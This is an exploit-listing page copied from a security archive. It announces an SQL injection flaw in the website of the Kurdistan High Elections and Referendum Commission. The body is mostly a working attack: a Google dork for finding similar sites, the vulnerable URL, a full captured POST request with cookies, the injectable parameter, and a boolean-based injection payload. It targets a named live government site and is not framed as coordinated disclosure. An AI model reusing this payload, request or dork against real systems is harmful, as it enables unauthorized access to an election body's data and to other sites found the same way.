Advertisement






Kurdistan High Elections and Referendum Commission SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-08-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080031

Below is a copy:

Kurdistan High Elections and Referendum Commission SQL Injection Vulnerability
#Exploit Title: Kurdistan High Elections and Referendum Commission
#Author: Emyounoone
#Google Dork: inurl:about.aspx?type=
#Date: 8/8/2021
#Tested On: Kali Linux 
#Target Home Page: https://www.khec.krd

------------------------------------------------------------------------------------------------

Vulnerable Path: https://www.khec.krd/about.aspx?type=1


POST https://www.khec.krd/about.aspx?type=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 6100
Referer: https://www.khec.krd/about.aspx?type=1
Cookie: 99=yes; 45=yes; 46=yes; 36=yes; 37=yes; 48=yes; 49=yes; 39=yes; ARRAffinitySameSite=b58ed186e2b61004b35a91eecc2993dae826e74b0fc1745b541dd38dfc4c05ef; 80=yes; 93=yes; 71=yes; 94=yes; 72=yes; 95=yes; 40=yes; ARRAffinity=b58ed186e2b61004b35a91eecc2993dae826e74b0fc1745b541dd38dfc4c05ef; 96=yes; 41=yes; 42=yes; 98=yes; 76=yes
Host: www.khec.krd

Parameter: __VIEWSTATEGENERATOR
Payload: E809BCA5 AND 1=1 -- 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum